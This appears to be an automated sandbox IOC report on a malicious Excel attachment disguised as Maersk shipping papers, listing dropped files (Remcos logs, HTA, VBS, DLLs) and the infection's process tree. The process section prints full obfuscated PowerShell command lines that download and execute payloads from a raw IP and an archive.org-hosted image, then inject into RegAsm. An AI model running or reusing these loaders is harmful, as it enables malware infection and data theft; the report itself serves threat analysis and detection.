IOC Report
Maersk BL, IN & PL.xls

loading gif

Files

File Path
Type
Category
Malicious
Maersk BL, IN & PL.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 8 09:27:46 2024, Security: 1
initial sample
 malicious
C:\ProgramData\remcos\logs.dat
data
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\verynicepersonupdation[1].hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
modified
 malicious
C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\Users\user\Desktop\Maersk BL, IN & PL.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 8 14:37:28 2024, Security: 1
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nicefeaturesworkinggreat[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29FB170A.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D56DFF6.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CE82783.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BD368F89.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E35333A8.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EEBFA774.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\3rzwaytj.4q5.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\4lwehmwo.doj.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\RES781D.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 8 13:37:19 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RESB635.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 8 13:37:34 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\ah20ye0d.spn.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\bhvCD3E.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x3faf030b, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\bugbxyhv.p5d.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\e4do0c4w.twh.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ikgak1ko.mcs.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\lsbhsioi.35z.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\m3ilgpko.m43.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\n0fnsjo0.bg3.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\nnmswnbn\CSC2F3646BAED0D4162AB721EA9AB40E2EA.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
dropped
C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\op4j5mgw\CSC61FD86854EBB47F380D5789CC9CFF7A.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
dropped
C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\ozryhes2.bh0.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\rqgexaaqlwosdbspgszm
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\wfu5v1io.5uf.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\xv5wy1lg.101.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DFACF8B57DCACC5AF4.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFD8D824302903CE2C.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFF08028DB5BAA2AA5.TMP
data
dropped
C:\Users\user\Desktop\6E530000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 8 14:37:28 2024, Security: 1
dropped
C:\Users\user\Desktop\6E530000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
There are 36 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
 malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.cmdline"
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )"
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.cmdline"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rqgexaaqlwosdbspgszm"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\tkloyslrzegxfpgbpcmonko"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\emrhylvlvnykqvcfgfgpxwbgnd"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
